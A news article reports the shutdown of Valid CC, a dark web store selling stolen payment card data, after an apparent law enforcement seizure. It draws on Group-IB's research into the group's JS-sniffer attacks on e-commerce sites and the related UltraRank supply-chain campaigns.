A dark web market handled by a cybercrime group, Valid CC has been hacking online merchants and stealing payment credentials for more than six years. Last week, Valid CC closed down abruptly. The owners of Valid CC say that a law enforcement operation seized their servers. The operation aimed to seize and capture the store’s infrastructure. A number of online shops sell “card not present” or “CNP” payment data on the internet. The payment data may be stolen from credit cards of e-commerce stores, but it’s mostly sourced from cybercriminals and threat actors.
However, in the case of Valid CC, experts believe that the store attacked and hacked hundreds of e-commerce merchants. The hackers seeded websites with hidden card skimming codes that stole personal information and payment credentials when a customer went through the checkout stage.
Group-IB, a Russian based cybersecurity firm, had published a report last year where it briefed about the operations of Valid CC, highlighting that Valid CC was responsible for hacking around 700 e-commerce stores. Besides this, Group IB identified another group “UltraRank” responsible for attacking additional 13 third-party suppliers that offered software components to these online stores spread across Europe, America, and Asia.
Experts believe that UltraRank orchestrated a series of cyberattacks, which were earlier attributed to three different cybercrime groups by cybersecurity firms. “Over five years….UltraRank changed its infrastructure and malicious code on numerous occasions, as a result of which cybersecurity experts would wrongly attribute its attacks to other threat actors,” said Group-IB. It adds, “UltraRank combined attacks on single targets with supply chain attacks.”
Valid CC’s muscle man on various platforms- a hacker who goes by the handle of SPR, notified customers that the shop would be shut down from 28 January, following a law enforcement operation that sealed Valid CC’s operations.
According to SPR, Valid CC lost access to more than 600,000 unsold payment card accounts, a very heavy blow to the store’s inventory. As a result, Valid CC lost its proxy and destination servers, and now it can’t open and decrypt the back-end, says SPR.
Group-IB reports, “the store’s official representative on underground forums is a user with the nickname SPR. In many posts, SPR claims that the card data sold in the ValidCC store was obtained using JS sniffers. Most of SPR’s posts are written in English, however, SPR often switches to Russian, while communicating with customers. This might indicate that ValidCC is probably managed by a Russian speaker.”